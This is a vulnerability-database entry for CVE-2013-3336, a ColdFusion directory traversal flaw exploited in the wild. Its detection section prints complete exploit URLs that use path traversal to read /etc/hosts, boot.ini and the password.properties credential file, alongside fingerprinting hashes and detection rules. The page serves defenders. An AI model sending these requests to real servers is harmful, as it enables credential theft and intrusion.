cbcvebase.
CVE-2013-3336
published 2013-05-09

CVE-2013-3336: Unspecified vulnerability in Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote attackers to read arbitrary files via unknown vectors.

PriorityP273medium5CVSS 2.0
AVNACLAuNCPINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
74.27%
99.4th percentile
Unspecified vulnerability in Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote attackers to read arbitrary files via unknown vectors.

Affected

4 ranges
VendorProductVersion rangeFixed in
adobecoldfusion
adobecoldfusion
adobecoldfusion
adobecoldfusion

Detection & IOCsextracted from sources · hover to see the quote

url/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../../etc/hosts&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp
url/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../../boot.ini&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp
url/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/analyzer/index.cfm&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp
path/CFIDE/adminapi/customtags/l10n.cfm
path/CFIDE/administrator/images/loginbackground.jpg
filenamepassword.properties
path../../lib/password.properties
path../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties
path../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties
hasha4c81b7a6289b2fc9b36848fa0cae83c
hash596b3fc4f1a0b818979db1cf94a82220
hash779efc149954677095446c167344dbfc
cookieANALYZER_DIRECTORY
  • Detect directory traversal exploitation attempts targeting l10n.cfm via the 'attributes.file' and 'filename' parameters containing path traversal sequences (../../) combined with 'download.cfm' as the file value and 'thisTag.executionmode=end' in the query string.
  • Alert on HTTP responses setting the 'ANALYZER_DIRECTORY' cookie, which indicates successful path disclosure exploitation of the l10n.cfm endpoint.
  • Flag HTTP requests to /CFIDE/adminapi/customtags/l10n.cfm containing 'thisTag.executionmode=end' and 'thisTag.generatedContent=htp' as indicators of active exploitation.
  • Detect successful credential file exfiltration by monitoring HTTP responses containing the string 'encrypted=true', which indicates password.properties content was returned.
  • Monitor GET requests to /CFIDE/administrator/images/loginbackground.jpg as a fingerprinting step preceding exploitation; MD5 hashes of the response body are used to identify CF version.
  • The Metasploit module targets the same directory traversal to extract password, rdspassword, and encrypted properties from password.properties on ColdFusion 9 and 10.
  • ·The exploit is described as a Local File Inclusion (LFI), not a Local File Download — meaning it can include and execute pre-existing .cfm files on the server, not just read arbitrary files.

CVSS provenance

nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.